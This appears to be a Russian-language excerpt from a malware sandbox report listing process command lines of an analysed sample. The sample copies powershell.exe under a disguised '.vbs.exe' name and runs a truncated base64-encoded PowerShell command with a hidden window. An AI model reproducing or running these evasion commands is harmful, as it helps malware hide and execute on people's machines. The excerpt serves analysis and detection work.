Техническая информация
- '<PATH_SAMPLE>.vbs.exe' -enc JABSAHcAcAByAGYAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAu...
- <PATH_SAMPLE>.vbs.exe
- <PATH_SAMPLE>.vbs.exe
- '<SYSTEM32>\cmd.exe' /c copy "%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<PATH_SAMPLE>.vbs.exe" /Y
- '<PATH_SAMPLE>.vbs.exe' -enc JABSAHcAcAByAGYAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAu... (со скрытым окном)